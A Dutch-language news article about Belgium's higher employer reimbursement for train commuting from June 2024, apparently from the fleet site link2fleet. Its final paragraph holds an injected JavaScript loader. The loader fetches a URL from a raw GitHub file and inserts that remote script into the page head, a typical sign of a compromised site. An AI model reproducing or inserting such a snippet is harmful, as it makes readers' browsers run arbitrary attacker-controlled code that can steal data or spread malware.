Gepubliceerd op 9 April 2024 om 09h38
Door Kevin Kersemans

Woon-werkverplaatsingen per trein beter terugbetaald

Vanaf 1 juni 2024 stijgt de werkgeverstussenkomst voor woon-werkverplaatsingen per trein. Dat is het gevolg van een nieuwe nationale CAO die de sociale partners hebben afgesloten om de tariefverhogingen bij de NMBS te verzachten.

Nadat begin dit jaar al de fietsvergoedingen voor woon-werkverplaatsingen werden opgetrokken, zal vanaf 1 juni ook de werkgeverstussenkomst voor treinpendelaars stijgen, van 56 naar 71,8%. Maandag werd in de Nationale Arbeidsraad een nieuwe collectieve arbeidsovereenkomst in die zin afgesloten (CAO 19/11, ter vervanging van 19/9). Daarbovenop kent de overheid de bedrijven een belastingkrediet van 7,5% toe, dankzij een voorstel van federaal mobiliteitsminister George Gilkinet (Ecolo) dat eerder werd goedgekeurd in de Kern.

Ook voor flexabonnementen

Zo’n 100.000 werknemers zullen hierdoor nog slechts 20,7% van hun treinabonnement uit eigen zak  moeten betalen (71,8 + 7,5%), in plaats van 44% voordien. Bovendien staat het de sociale partners vrij om regelingen uit te werken die nog gunstiger zijn voor de werknemers. De nieuwe CAO geldt bovendien ook voor zogenaamde flexabonnementen, die in het leven werden geroepen voor mensen die regelmatig telewerken en dus niet elke (werk)dag pendelen.

Het doel is uiteraard om werknemers aan te moedigen de trein te nemen naar hun werk en om de tariefverhogingen van bijna 6% die de NMBS eerder dit jaar doorvoerde, te verzachten. Voor wie al geniet van het derdebetalersysteem (waarbij 80% van een NMBS-abonnement wordt betaald door de werkgever en de overige 20% door de overheid), verandert er niets. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Kevin Kersemans

Kevin Kersemans, redacteur van dit artikel

Kevin Kersemans is autojournalist met al enkele decennia ervaring op de teller. Zijn passie voor auto's en alles op wielen heeft hij al van kindsbeen af. Voor link2fleet volgt hij vooral de auto-actualiteit en test hij nieuwe modellen.
Dit artikel gaat over: News , Openbaar vervoer , Mobiliteit

Gelijkaardige artikels